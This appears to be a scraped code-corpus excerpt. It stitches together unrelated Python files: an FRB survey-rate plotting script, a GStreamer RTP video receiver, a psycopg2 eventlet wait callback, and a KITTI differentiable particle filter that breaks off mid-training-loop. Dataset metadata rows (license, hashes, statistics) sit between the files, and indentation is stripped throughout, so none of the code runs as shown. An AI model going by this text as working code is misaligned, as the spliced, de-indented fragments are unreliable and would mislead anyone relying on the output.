# Parkes also has galactic limits:
if name == 'parkes-htru':
pop.gen_index()
pop.gen_dist()
pop.gen_time()
# Generate FRBs just within the galactic constraints
pop.gen_direction()
# Gather ra, dec coordinate limits
lims = {'min_ra': survey.ra_min, 'max_ra': survey.ra_max,
'min_dec': survey.dec_min, 'max_dec': survey.dec_max}
def sample(n_gen):
ra, dec = did.uniform(n_srcs=n_gen, **lims)
gl, gb = go.radec_to_lb(ra, dec, frac=True)
coords = [ra, dec, gl, gb]
return coords
def accept(coords):
return survey.in_region(*coords)
coords = sample(int(SIZE))
mask = accept(coords)
reject, = np.where(~mask)
while reject.size > 0:
fill = sample(reject.size)
mask = accept(fill)
for i in range(len(coords)):
coords[i][reject[mask]] = fill[i][mask]
reject = reject[~mask]
# Assign the values
frbs = pop.frbs
frbs.ra, frbs.dec = coords[0], coords[1]
frbs.gl, frbs.gb = coords[2], coords[3]
# Continue with generation
pop.gen_gal_coords()
pop.gen_dm()
pop.gen_w()
pop.gen_lum()
pop.gen_si()
else:
pop.generate()
surv_pop = SurveyPopulation(pop, survey, scale_by_area=False)
surv_pop.source_rate.f_area = surv_f_area[name]
surv_pop.source_rate.scale_by_area()
# surv_pop.save()
surv_pops.append(surv_pop)
else:
surv_pops = []
for name in SURVEYS:
surv_pops.append(unpickle(f'optimal_{name}'))
# Start plot
plot_aa_style(cols=2)
plt.rcParams["figure.figsize"] = (3.556*3, 3.556)
fig, axes = plt.subplots(1, 3)
for ax in axes.flatten():
ax.set_aspect('auto')
# Get norm pop
y = 0
ys = []
names = []
rates = []
norm_sim_rate = surv_pops[0].source_rate.det
norm_real_rate = EXPECTED['parkes-htru'][0] / EXPECTED['parkes-htru'][1]
norm_rate = norm_sim_rate / norm_real_rate
for i, surv_pop in enumerate(surv_pops):
name = surv_pop.name.split('_')[-1]
pprint(name)
if surv_pop.n_sources() == 0:
print(surv_pop.source_rate)
print(f'{name} | no FRBs in population')
continue
names.append(name)
ys.append(y)
# Dimensions measure plot
ax = axes[0]
ax.set_xlabel(r'DM ($\textrm{pc}\ \textrm{cm}^{-3}$)')
ax.set_ylabel(r'\#')
ax.set_yscale('log')
bins, values = hist(surv_pop.frbs.dm, bin_type='lin', norm='frac',
n_bins=20)
values = values.astype(np.float64)
values *= float(surv_pop.source_rate.f_area)*1e6
ax.step(bins, values, where='mid', label=name)
# Fluence plot
ax = axes[1]
ax.set_xlabel('S/N')
ax.set_xscale('log')
ax.set_ylabel(r'\#(${>}\text{S/N}$)')
ax.set_yscale('log')
# Update fluence plot
bins, values = hist(surv_pop.frbs.snr, bin_type='log', norm='frac',
n_bins=25)
# Cumulative sum
values = np.cumsum(values[::-1])[::-1]
values = values.astype(np.float64)
values *= float(surv_pop.source_rate.f_area)*1e6
ax.step(bins, values, where='mid', label=name)
# Plot rates
ax = axes[2]
ax.set_xscale('log')
ax.set_xlabel(r'Rate (day$^{-1}$)')
rate = surv_pop.source_rate.det/norm_rate
print(f'rate: {rate}')
line = ax.errorbar(rate, y,
fmt='x',
label=rf'{name}')
ax.grid()
rates.append(rate)
y += 1
ax.yaxis.tick_right()
ax.set_yticks(ys)
ax.set_yticklabels(names)
colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
for i, y in enumerate(ax.get_yticklabels()):
y.set_color(colors[i])
ax.invert_yaxis() # labels read top-to-bottom
# Add thin grey horizontal lines
x_lim = ax.get_xlim()
ax.set_xlim(x_lim)
for i, y in enumerate(ys):
ax.plot((x_lim[0], rates[i]), (y, y), color='k', lw=0.5, zorder=0, ls='--')
for e in list(zip(SURVEYS, rates)):
pprint(e)
euclidean_lines = True
if euclidean_lines:
xlims = axes[1].get_xlim()
ylims = axes[1].get_ylim()
axes[1].set_xlim(xlims)
axes[1].set_ylim(ylims)
xs = np.logspace(np.log10(xlims[0]),
np.log10(xlims[1]),
100)
for n in range(-10, 15):
ys = 10**((np.log10(xs)+n)*-1.5)
axes[1].plot(xs, ys, 'k:', linewidth=0.25)
# plt.legend()
plt.tight_layout()
plt.savefig(rel_path('./plots/future_surveys.pdf'))
| mit | 1,674,763,514,524,134,700 | 28.251121 | 86 | 0.555879 | false | 3.08708 | false | false | false |
i02sopop/Kirinki | gstreamer/examples/video_receiver.py | 1 | 2317 | #!/usr/bin/env python
# -=- encoding: utf-8 -=-
################ VIDEO RECEIVER
import gobject, pygst
pygst.require("0.10")
import gst
# TODO: detect from the RTPSource element inside the GstRtpBin
REMOTE_HOST = '192.168.34.150'
READ_VIDEO_CAPS = 'video.caps'
pipeline = gst.Pipeline('server')
caps = open(READ_VIDEO_CAPS).read().replace('\\', '')
rtpbin = gst.element_factory_make('gstrtpbin', 'rtpbin')
rtpbin.set_property('latency', 400)
udpsrc_rtpin = gst.element_factory_make('udpsrc', 'udpsrc0')
udpsrc_rtpin.set_property('port', 10000)
udpsrc_caps = gst.caps_from_string(caps)
udpsrc_rtpin.set_property('caps', udpsrc_caps)
udpsrc_rtcpin = gst.element_factory_make('udpsrc', 'udpsrc1')
udpsrc_rtcpin.set_property('port', 10001)
udpsink_rtcpout = gst.element_factory_make('udpsink', 'udpsink0')
udpsink_rtcpout.set_property('host', REMOTE_HOST)
udpsink_rtcpout.set_property('port', 10002)
rtph264depay = gst.element_factory_make('rtph264depay', 'rtpdepay')
q1 = gst.element_factory_make("queue", "q1")
q2 = gst.element_factory_make("queue", "q2")
avimux = gst.element_factory_make('avimux', 'avimux')
filesink = gst.element_factory_make('filesink', 'filesink')
filesink.set_property('location', '/tmp/go.avi')
ffmpegcs = gst.element_factory_make("ffmpegcolorspace", "ffmpegcs")
ffdec264 = gst.element_factory_make('ffdec_h264', 'ffdec264')
autovideosink = gst.element_factory_make('autovideosink')
pipeline.add(rtpbin, udpsrc_rtpin, udpsrc_rtcpin, udpsink_rtcpout,
rtph264depay, q1, avimux, ffdec264, autovideosink)
# Receive the RTP and RTCP streams
udpsrc_rtpin.link_pads('src', rtpbin, 'recv_rtp_sink_0')
udpsrc_rtcpin.link_pads('src', rtpbin, 'recv_rtcp_sink_0')
# reply with RTCP stream
rtpbin.link_pads('send_rtcp_src_0', udpsink_rtcpout, 'sink')
# Plus the RTP into the rest of the pipe...
def rtpbin_pad_added(obj, pad):
print "PAD ADDED"
print " obj", obj
print " pad", pad
rtpbin.link(rtph264depay)
rtpbin.connect('pad-added', rtpbin_pad_added)
gst.element_link_many(rtph264depay, q1, ffdec264, autovideosink)
def start():
pipeline.set_state(gst.STATE_PLAYING)
udpsink_rtcpout.set_locked_state(gst.STATE_PLAYING)
print "Started..."
def loop():
print "Running..."
gobject.MainLoop().run()
if __name__ == '__main__':
start()
loop()
| agpl-3.0 | -9,069,301,017,670,709,000 | 33.073529 | 67 | 0.70738 | false | 2.565891 | false | false | false |
cloudysunny14/CloudySwitch | cloudyswitch/app/psyco_eventlet.py | 1 | 2308 | """A wait callback to allow psycopg2 cooperation with eventlet.
Use `make_psycopg_green()` to enable eventlet support in Psycopg.
"""
# Copyright (C) 2010 Daniele Varrazzo <[email protected]>
# and licensed under the MIT license:
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import psycopg2
from psycopg2 import extensions
from eventlet.hubs import trampoline
LOG = logging.getLogger(__name__)
def make_psycopg_green():
"""Configure Psycopg to be used with eventlet in non-blocking way."""
if not hasattr(extensions, 'set_wait_callback'):
raise ImportError(
"support for coroutines not available in this Psycopg version (%s)"
% psycopg2.__version__)
extensions.set_wait_callback(eventlet_wait_callback)
def eventlet_wait_callback(conn, timeout=-1):
"""A wait callback useful to allow eventlet to work with Psycopg."""
while 1:
state = conn.poll()
if state == extensions.POLL_OK:
break
elif state == extensions.POLL_READ:
trampoline(conn.fileno(), read=True)
elif state == extensions.POLL_WRITE:
trampoline(conn.fileno(), write=True)
else:
raise psycopg2.OperationalError(
"Bad result from poll: %r" % state)
| apache-2.0 | -6,447,168,683,168,695,000 | 42.54717 | 79 | 0.717938 | false | 4.204007 | false | false | false |
tu-rbo/differentiable-particle-filters | methods/dpf_kitti.py | 1 | 43029 | import os
import numpy as np
import sonnet as snt
import tensorflow as tf
import matplotlib.pyplot as plt
from utils.data_utils_kitti import wrap_angle, compute_statistics, split_data, make_batch_iterator, make_repeating_batch_iterator, rotation_matrix, load_data_for_stats
from utils.method_utils import atan2, compute_sq_distance
from utils.plotting_utils import plot_maze, show_pause
from datetime import datetime
if tf.__version__ == '1.1.0-rc1' or tf.__version__ == '1.2.0':
from tensorflow.python.framework import ops
@ops.RegisterGradient("FloorMod")
def _mod_grad(op, grad):
x, y = op.inputs
gz = grad
x_grad = gz
y_grad = None # tf.reduce_mean(-(x // y) * gz, axis=[0], keep_dims=True)[0]
return x_grad, y_grad
class DPF():
def __init__(self, init_with_true_state, learn_odom, use_proposer, propose_ratio, proposer_keep_ratio, min_obs_likelihood, learn_gaussian_mle):
"""
:param init_with_true_state:
:param learn_odom:
:param use_proposer:
:param propose_ratio:
:param particle_std:
:param proposer_keep_ratio:
:param min_obs_likelihood:
"""
# store hyperparameters which are needed later
self.init_with_true_state = init_with_true_state
self.learn_odom = learn_odom
self.use_proposer = use_proposer and not init_with_true_state # only use proposer if we do not initializet with true state
self.propose_ratio = propose_ratio if not self.init_with_true_state else 0.0
# define some more parameters and placeholders
self.state_dim = 5
self.action_dim = 3
self.observation_dim = 6
self.placeholders = {'o': tf.placeholder('float32', [None, None, 50, 150, self.observation_dim], 'observations'),
'a': tf.placeholder('float32', [None, None, 3], 'actions'),
's': tf.placeholder('float32', [None, None, 5], 'states'),
'num_particles': tf.placeholder('float32'),
'keep_prob': tf.placeholder_with_default(tf.constant(1.0), []),
'is_training': tf.placeholder_with_default(tf.constant(False), [])
}
self.num_particles_float = self.placeholders['num_particles']
self.num_particles = tf.to_int32(self.num_particles_float)
# build learnable modules
self.build_modules(min_obs_likelihood, proposer_keep_ratio, learn_gaussian_mle)
def build_modules(self, min_obs_likelihood, proposer_keep_ratio, learn_gaussian_mle):
"""
:param min_obs_likelihood:
:param proposer_keep_ratio:
:return: None
"""
# MEASUREMENT MODEL
# conv net for encoding the image
self.encoder = snt.Sequential([
snt.nets.ConvNet2D([16, 16, 16, 16], [[7, 7], [5, 5], [5, 5], [5, 5]], [[1,1], [1, 2], [1, 2], [2, 2]], [snt.SAME], activate_final=True, name='encoder/convnet'),
snt.BatchFlatten(),
lambda x: tf.nn.dropout(x, self.placeholders['keep_prob']),
snt.Linear(128, name='encoder/linear'),
tf.nn.relu
])
# observation likelihood estimator that maps states and image encodings to probabilities
self.obs_like_estimator = snt.Sequential([
snt.Linear(128, name='obs_like_estimator/linear'),
tf.nn.relu,
snt.Linear(128, name='obs_like_estimator/linear'),
tf.nn.relu,
snt.Linear(1, name='obs_like_estimator/linear'),
tf.nn.sigmoid,
lambda x: x * (1 - min_obs_likelihood) + min_obs_likelihood
], name='obs_like_estimator')
# motion noise generator used for motion sampling
if learn_gaussian_mle:
self.mo_noise_generator = snt.nets.MLP([32, 32, 4], activate_final=False, name='mo_noise_generator')
else:
self.mo_noise_generator = snt.nets.MLP([32, 32, 2], activate_final=False, name='mo_noise_generator')
# odometry model (if we want to learn it)
if self.learn_odom:
self.mo_transition_model = snt.nets.MLP([128, 128, 128, self.state_dim], activate_final=False, name='mo_transition_model')
# particle proposer that maps encodings to particles (if we want to use it)
if self.use_proposer:
self.particle_proposer = snt.Sequential([
snt.Linear(128, name='particle_proposer/linear'),
tf.nn.relu,
lambda x: tf.nn.dropout(x, proposer_keep_ratio),
snt.Linear(128, name='particle_proposer/linear'),
tf.nn.relu,
snt.Linear(128, name='particle_proposer/linear'),
tf.nn.relu,
snt.Linear(128, name='particle_proposer/linear'),
tf.nn.relu,
snt.Linear(4, name='particle_proposer/linear'),
tf.nn.tanh,
])
self.noise_scaler1 = snt.Module(lambda x: x * tf.exp(10 * tf.get_variable('motion_sampler/noise_scaler1', initializer=np.array(0.0, dtype='float32'))))
self.noise_scaler2 = snt.Module(lambda x: x * tf.exp(10 * tf.get_variable('motion_sampler/noise_scaler2', initializer=np.array(0.0, dtype='float32'))))
def custom_build(self, inputs):
"""A custom build method to wrap into a sonnet Module."""
outputs = snt.Conv2D(output_channels=16, kernel_shape=[7, 7], stride=[1, 1])(inputs)
outputs = tf.nn.relu(outputs)
outputs = snt.Conv2D(output_channels=16, kernel_shape=[5, 5], stride=[1, 2])(outputs)
outputs = tf.nn.relu(outputs)
outputs = snt.Conv2D(output_channels=16, kernel_shape=[5, 5], stride=[1, 2])(outputs)
outputs = tf.nn.relu(outputs)
outputs = snt.Conv2D(output_channels=16, kernel_shape=[5, 5], stride=[2, 2])(outputs)
outputs = tf.nn.relu(outputs)
outputs = tf.nn.dropout(outputs, self.placeholders['keep_prob'])
outputs = snt.BatchFlatten()(outputs)
outputs = snt.Linear(128)(outputs)
outputs = tf.nn.relu(outputs)
return outputs
def measurement_update(self, encoding, particles, means, stds):
"""
Compute the likelihood of the encoded observation for each particle.
:param encoding: encoding of the observation
:param particles:
:param means:
:param stds:
:return: observation likelihood
"""
# prepare input (normalize particles poses and repeat encoding per particle)
particle_input = self.transform_particles_as_input(particles, means, stds)
encoding_input = tf.tile(encoding[:, tf.newaxis, :], [1, tf.shape(particles)[1], 1])
input = tf.concat([encoding_input, particle_input], axis=-1)
# estimate the likelihood of the encoded observation for each particle, remove last dimension
obs_likelihood = snt.BatchApply(self.obs_like_estimator)(input)[:, :, 0]
return obs_likelihood
def transform_particles_as_input(self, particles, means, stds):
return ((particles - means['s']) / stds['s'])[..., 3:5]
def propose_particles(self, encoding, num_particles, state_mins, state_maxs):
duplicated_encoding = tf.tile(encoding[:, tf.newaxis, :], [1, num_particles, 1])
proposed_particles = snt.BatchApply(self.particle_proposer)(duplicated_encoding)
proposed_particles = tf.concat([
proposed_particles[:,:,:1] * (state_maxs[0] - state_mins[0]) / 2.0 + (state_maxs[0] + state_mins[0]) / 2.0,
proposed_particles[:,:,1:2] * (state_maxs[1] - state_mins[1]) / 2.0 + (state_maxs[1] + state_mins[1]) / 2.0,
atan2(proposed_particles[:,:,2:3], proposed_particles[:,:,3:4])], axis=2)
return proposed_particles
def motion_update(self, actions, particles, means, stds, state_step_sizes, learn_gaussian_mle, stop_sampling_gradient=False):
"""
Move particles according to odometry info in actions. Add learned noise.
:param actions:
:param particles:
:param means:
:param stds:
:param state_step_sizes:
:param stop_sampling_gradient:
:return: moved particles
"""
# 1. SAMPLE NOISY ACTIONS
# add dimension for particles
time_step = 0.103
if learn_gaussian_mle:
actions = tf.concat([particles[:, :, 3:4] - means['s'][:, :, 3:4], particles[:, :, 4:5] - means['s'][:, :, 4:5]], axis=-1)
# prepare input (normalize actions and repeat per particle)
action_input = actions / stds['s'][:, :, 3:5]
input = action_input
# estimate action noise
delta = snt.BatchApply(self.mo_noise_generator)(input)
delta = tf.concat([delta[:, :, 0:2] * state_step_sizes[3], delta[:, :, 2:4] * state_step_sizes[4]], axis=-1)
if stop_sampling_gradient:
delta = tf.stop_gradient(delta)
action_vel_f = tf.random_normal(tf.shape(particles[:, :, 3:4]), mean = delta[:, :, 0:1], stddev = delta[:, :, 1:2])
action_vel_rot = tf.random_normal(tf.shape(particles[:, :, 4:5]), mean = delta[:, :, 2:3], stddev = delta[:, :, 3:4])
heading = particles[:, :, 2:3]
sin_heading = tf.sin(heading)
cos_heading = tf.cos(heading)
new_x = particles[:, :, 0:1] + cos_heading * particles[:, :, 3:4] * time_step
new_y = particles[:, :, 1:2] + sin_heading * particles[:, :, 3:4] * time_step
new_theta = particles[:, :, 2:3] + particles[:, :, 4:5] * time_step
wrap_angle(new_theta)
new_v = particles[:, :, 3:4] + action_vel_f
new_theta_dot = particles[:, :, 4:5] + action_vel_rot
moved_particles = tf.concat([new_x, new_y, new_theta, new_v, new_theta_dot], axis=-1)
return moved_particles, delta
else:
heading = particles[:, :, 2:3]
sin_heading = tf.sin(heading)
cos_heading = tf.cos(heading)
random_input = tf.random_normal(tf.shape(particles[:, :, 3:5]))
noise = snt.BatchApply(self.mo_noise_generator)(random_input)
noise = noise - tf.reduce_mean(noise, axis=1, keep_dims=True)
new_z = particles[:, :, 0:1] + cos_heading * particles[:, :, 3:4] * time_step
new_x = particles[:, :, 1:2] + sin_heading * particles[:, :, 3:4] * time_step
new_theta = wrap_angle(particles[:, :, 2:3] + particles[:, :, 4:5] * time_step)
new_v = particles[:, :, 3:4] + noise[:, :, :1] * state_step_sizes[3]
new_theta_dot = particles[:, :, 4:5] + noise[:, :, 1:] * state_step_sizes[4]
moved_particles = tf.concat([new_z, new_x, new_theta, new_v, new_theta_dot], axis=-1)
return moved_particles
def compile_training_stages(self, sess, batch_iterators, particle_list, particle_probs_list, encodings, means, stds, state_step_sizes, state_mins, state_maxs, learn_gaussian_mle, learning_rate, plot_task):
# TRAINING!
losses = dict()
train_stages = dict()
std = 0.25
# TRAIN ODOMETRY
if self.learn_odom:
# apply model
motion_samples = self.motion_update(self.placeholders['a'][:,0],
self.placeholders['s'][:, :1],
means, stds, state_step_sizes,
stop_sampling_gradient=True)
# define loss and optimizer
sq_distance = compute_sq_distance(motion_samples, self.placeholders['s'][:, 1:2], state_step_sizes)
losses['motion_mse'] = tf.reduce_mean(sq_distance, name='loss')
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# put everything together
train_stages['train_odom'] = {
'train_op': optimizer.minimize(losses['motion_mse']),
'batch_iterator_names': {'train': 'train1', 'val': 'val1'},
'monitor_losses': ['motion_mse'],
'validation_loss': 'motion_mse',
'plot': lambda e: self.plot_motion_model(sess, next(batch_iterators['val2']), motion_samples, plot_task, state_step_sizes) if e % 1 == 0 else None
}
# TRAIN MOTION MODEL
if learn_gaussian_mle:
motion_samples, motion_params = self.motion_update(self.placeholders['a'][:,1],
tf.tile(self.placeholders['s'][:, :1], [1, 1, 1]),
means, stds, state_step_sizes, learn_gaussian_mle)
# define loss and optimizer
diff_in_states = self.placeholders['s'][:, 1:2] - self.placeholders['s'][:, :1]
activations_vel_f = (1 / 32) / tf.sqrt(2 * np.pi * motion_params[:, :, 1] ** 2) * tf.exp(
-(diff_in_states[:, :, 3] - motion_params[:, :, 0]) ** 2 / (2.0 * motion_params[:, :, 1] ** 2))
activations_vel_rot = (1 / 32) / tf.sqrt(2 * np.pi * motion_params[:, :, 3] ** 2) * tf.exp(
-(diff_in_states[:, :, 4] - motion_params[:, :, 2]) ** 2 / (2.0 * motion_params[:, :, 3] ** 2))
losses['motion_mle'] = tf.reduce_mean(-tf.log(1e-16 + (tf.reduce_sum(activations_vel_f, axis=-1, name='loss1') * tf.reduce_sum(activations_vel_rot, axis=-1, name='loss2'))))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# put everything together
train_stages['train_motion_sampling'] = {
'train_op': optimizer.minimize(losses['motion_mle']),
'batch_iterator_names': {'train': 'train2', 'val': 'val2'},
'monitor_losses': ['motion_mle'],
'validation_loss': 'motion_mle',
'plot': lambda e: self.plot_motion_model(sess, next(batch_iterators['val2']), motion_samples, plot_task, state_step_sizes) if e % 1 == 0 else None
}
else:
motion_samples = self.motion_update(self.placeholders['a'][:,1],
tf.tile(self.placeholders['s'][:, :1], [1, self.num_particles, 1]),
means, stds, state_step_sizes, learn_gaussian_mle)
# define loss and optimizer
sq_distance = compute_sq_distance(motion_samples, self.placeholders['s'][:, 1:2], state_step_sizes)
activations_sample = (1 / self.num_particles_float) / tf.sqrt(2 * np.pi * std ** 2) * tf.exp(
-sq_distance / (2.0 * std ** 2))
losses['motion_mle'] = tf.reduce_mean(-tf.log(1e-16 + tf.reduce_sum(activations_sample, axis=-1, name='loss')))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# put everything together
train_stages['train_motion_sampling'] = {
'train_op': optimizer.minimize(losses['motion_mle']),
'batch_iterator_names': {'train': 'train2', 'val': 'val2'},
'monitor_losses': ['motion_mle'],
'validation_loss': 'motion_mle',
'plot': lambda e: self.plot_motion_model(sess, next(batch_iterators['val2']), motion_samples, plot_task, state_step_sizes) if e % 1 == 0 else None
}
# TRAIN MEASUREMENT MODEL
# apply model for all pairs of observations and states in that batch
test_particles = tf.tile(self.placeholders['s'][tf.newaxis, :, 0], [self.batch_size, 1, 1])
measurement_model_out = self.measurement_update(encodings[:, 0], test_particles, means, stds)
# define loss (correct -> 1, incorrect -> 0) and optimizer
correct_samples = tf.diag_part(measurement_model_out)
incorrect_samples = measurement_model_out - tf.diag(tf.diag_part(measurement_model_out))
losses['measurement_heuristic'] = tf.reduce_sum(-tf.log(correct_samples)) / tf.cast(self.batch_size, tf.float32) \
+ tf.reduce_sum(-tf.log(1.0 - incorrect_samples)) / tf.cast(self.batch_size * (self.batch_size - 1), tf.float32)
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# put everything together
train_stages['train_measurement_model'] = {
'train_op': optimizer.minimize(losses['measurement_heuristic']),
'batch_iterator_names': {'train': 'train1', 'val': 'val1'},
'monitor_losses': ['measurement_heuristic'],
'validation_loss': 'measurement_heuristic',
'plot': lambda e: self.plot_measurement_model(sess, batch_iterators['val1'], measurement_model_out) if e % 1 == 0 else None
}
# TRAIN PARTICLE PROPOSER
if self.use_proposer:
# apply model (but only compute gradients until the encoding,
# otherwise we would unlearn it and the observation likelihood wouldn't work anymore)
proposed_particles = self.propose_particles(tf.stop_gradient(encodings[:, 0]), self.num_particles, state_mins, state_maxs)
# define loss and optimizer
std = 0.2
sq_distance = compute_sq_distance(proposed_particles, self.placeholders['s'][:, :1], state_step_sizes)
activations = (1 / self.num_particles_float) / tf.sqrt(2 * np.pi * std ** 2) * tf.exp(
-sq_distance / (2.0 * std ** 2))
losses['proposed_mle'] = tf.reduce_mean(-tf.log(1e-16 + tf.reduce_sum(activations, axis=-1)))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# put everything together
train_stages['train_particle_proposer'] = {
'train_op': optimizer.minimize(losses['proposed_mle']),
'batch_iterator_names': {'train': 'train1', 'val': 'val1'},
'monitor_losses': ['proposed_mle'],
'validation_loss': 'proposed_mle',
'plot': lambda e: self.plot_particle_proposer(sess, next(batch_iterators['val1']), proposed_particles, plot_task) if e % 10 == 0 else None
}
# END-TO-END TRAINING
# model was already applied further up -> particle_list, particle_probs_list
# define losses and optimizer
# first loss (which is being optimized)
sq_distance = compute_sq_distance(particle_list[:, :, :, 3:5], self.placeholders['s'][:, :, tf.newaxis, 3:5], state_step_sizes[3:5])
activations = particle_probs_list[:, :] / tf.sqrt(2 * np.pi * self.particle_std ** 2) * tf.exp(
-sq_distance / (2.0 * self.particle_std ** 2))
losses['mle'] = tf.reduce_mean(-tf.log(1e-16 + tf.reduce_sum(activations, axis=2, name='loss')))
# second loss (which we will monitor during execution)
pred = self.particles_to_state(particle_list, particle_probs_list)
sq_error = compute_sq_distance(pred[:, -1, 0:2], self.placeholders['s'][:, -1, 0:2], [1., 1.])
sq_dist = compute_sq_distance(self.placeholders['s'][:, 0, 0:2], self.placeholders['s'][:, -1, 0:2], [1., 1.])
losses['m/m'] = tf.reduce_mean(sq_error**0.5/sq_dist**0.5)
sq_error = compute_sq_distance(pred[:, -1, 2:3], self.placeholders['s'][:, -1, 2:3], [np.pi/180.0])
losses['deg/m'] = tf.reduce_mean(sq_error ** 0.5 / sq_dist ** 0.5)
# optimizer
optimizer = tf.train.AdamOptimizer(learning_rate)
# put everything together
train_stages['train_e2e'] = {
'train_op': optimizer.minimize(losses['mle']),
'batch_iterator_names': {'train': 'train', 'val': 'val'},
'monitor_losses': ['m/m', 'deg/m', 'mle'],
'validation_loss': 'deg/m',
'plot': lambda e: self.plot_particle_filter(sess, next(batch_iterators['val_ex']), particle_list,
particle_probs_list, state_step_sizes, plot_task) if e % 1 == 0 else None
}
return losses, train_stages
def load(self, sess, model_path, model_file='best_validation', statistics_file='statistics.npz', connect_and_initialize=True, modules=('encoder', 'mo_noise_generator', 'mo_transition_model', 'obs_like_estimator', 'particle_proposer')):
if type(modules) not in [type(list()), type(tuple())]:
raise Exception('modules must be a list or tuple, not a ' + str(type(modules)))
# build the tensorflow graph
if connect_and_initialize:
# load training data statistics (which are needed to build the tf graph)
statistics = dict(np.load(os.path.join(model_path, statistics_file)))
for key in statistics.keys():
if statistics[key].shape == ():
statistics[key] = statistics[key].item() # convert 0d array of dictionary back to a normal dictionary
# connect all modules into the particle filter
self.connect_modules(**statistics)
init = tf.global_variables_initializer()
sess.run(init)
# load variables
all_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
vars_to_load = []
loaded_modules = set()
for v in all_vars:
for m in modules:
if m in v.name:
vars_to_load.append(v)
loaded_modules.add(m)
print('Loading all modules')
saver = tf.train.Saver()
saver.restore(sess, os.path.join(model_path, model_file))
# def fit(self, sess, data, model_path, train_individually, train_e2e, split_ratio, seq_len, batch_size, epoch_length, num_epochs, patience, learning_rate, dropout_keep_ratio, num_particles, particle_std, plot_task=None, plot=False):
def fit(self, sess, data, model_path, train_individually, train_e2e, split_ratio, seq_len, batch_size, epoch_length, num_epochs, patience, learning_rate, dropout_keep_ratio, num_particles, particle_std, learn_gaussian_mle, plot_task=None, plot=False):
if plot:
plt.ion()
self.particle_std = particle_std
mean_loss_for_plot = np.zeros((1,))
means, stds, state_step_sizes, state_mins, state_maxs = compute_statistics(data)
data = split_data(data, ratio=split_ratio)
epoch_lengths = {'train': epoch_length, 'val': epoch_length*2}
batch_iterators = {'train': make_batch_iterator(data['train'], seq_len=seq_len, batch_size=batch_size),
'val': make_repeating_batch_iterator(data['val'], epoch_lengths['val'], batch_size=batch_size, seq_len=seq_len),
'train_ex': make_batch_iterator(data['train'], batch_size=batch_size, seq_len=seq_len),
'val_ex': make_batch_iterator(data['val'], batch_size=batch_size, seq_len=seq_len),
'train1': make_batch_iterator(data['train'], batch_size=batch_size, seq_len=1),
'train2': make_batch_iterator(data['train'], batch_size=batch_size, seq_len=2),
'val1': make_repeating_batch_iterator(data['val'], epoch_lengths['val'], batch_size=batch_size, seq_len=1),
'val2': make_repeating_batch_iterator(data['val'], epoch_lengths['val'], batch_size=batch_size, seq_len=2),
}
# build the tensorflow graph by connecting all modules in the particles filter
particles, particle_probs, encodings, particle_list, particle_probs_list = self.connect_modules(means, stds, state_mins, state_maxs, state_step_sizes, learn_gaussian_mle)
# define losses and train stages for different ways of training (e.g. training individual models and e2e training)
losses, train_stages = self.compile_training_stages(sess, batch_iterators, particle_list, particle_probs_list,
encodings, means, stds, state_step_sizes, state_mins,
state_maxs, learn_gaussian_mle, learning_rate, plot_task)
# initialize variables
init = tf.global_variables_initializer()
sess.run(init)
# save statistics and prepare saving variables
if not os.path.exists(model_path):
os.makedirs(model_path)
np.savez(os.path.join(model_path, 'statistics'), means=means, stds=stds, state_step_sizes=state_step_sizes,
state_mins=state_mins, state_maxs=state_maxs)
saver = tf.train.Saver()
save_path = os.path.join(model_path, 'best_validation')
# define the training curriculum
curriculum = []
if train_individually:
if self.learn_odom:
curriculum += ['train_odom']
curriculum += ['train_measurement_model']
curriculum += ['train_motion_sampling']
if self.use_proposer:
curriculum += ['train_particle_proposer']
if train_e2e:
curriculum += ['train_e2e']
# split data for early stopping
data_keys = ['train']
if split_ratio < 1.0:
data_keys.append('val')
# define log dict
log = {c: {dk: {lk: {'mean': [], 'se': []} for lk in train_stages[c]['monitor_losses']} for dk in data_keys} for c in curriculum}
# go through curriculum
for c in curriculum:
stage = train_stages[c]
best_val_loss = np.inf
best_epoch = 0
epoch = 0
if c == 'train_e2e':
saver.save(sess, os.path.join(model_path, 'before_e2e/best_validation'))
np.savez(os.path.join(model_path, 'before_e2e/statistics'), means=means, stds=stds, state_step_sizes=state_step_sizes,
state_mins=state_mins, state_maxs=state_maxs)
while epoch < num_epochs and epoch - best_epoch < patience:
# training
for dk in data_keys:
# don't train in the first epoch, just evaluate the initial parameters
if dk == 'train' and epoch == 0:
continue
# set up loss lists which will be filled during the epoch
loss_lists = {lk: [] for lk in stage['monitor_losses']}
for e in range(epoch_lengths[dk]):
# t0 = time.time()
# pick a batch from the right iterator
batch = next(batch_iterators[stage['batch_iterator_names'][dk]])
# define the inputs and train/run the model
input_dict = {**{self.placeholders[key]: batch[key] for key in 'osa'},
**{self.placeholders['num_particles']: num_particles},
}
if dk == 'train':
input_dict[self.placeholders['keep_prob']] = dropout_keep_ratio
input_dict[self.placeholders['is_training']] = True
monitor_losses = {l: losses[l] for l in stage['monitor_losses']}
if dk == 'train':
s_losses, _ = sess.run([monitor_losses, stage['train_op']], input_dict)
else:
s_losses = sess.run(monitor_losses, input_dict)
for lk in stage['monitor_losses']:
loss_lists[lk].append(s_losses[lk])
# after each epoch, compute and log statistics
for lk in stage['monitor_losses']:
log[c][dk][lk]['mean'].append(np.mean(loss_lists[lk]))
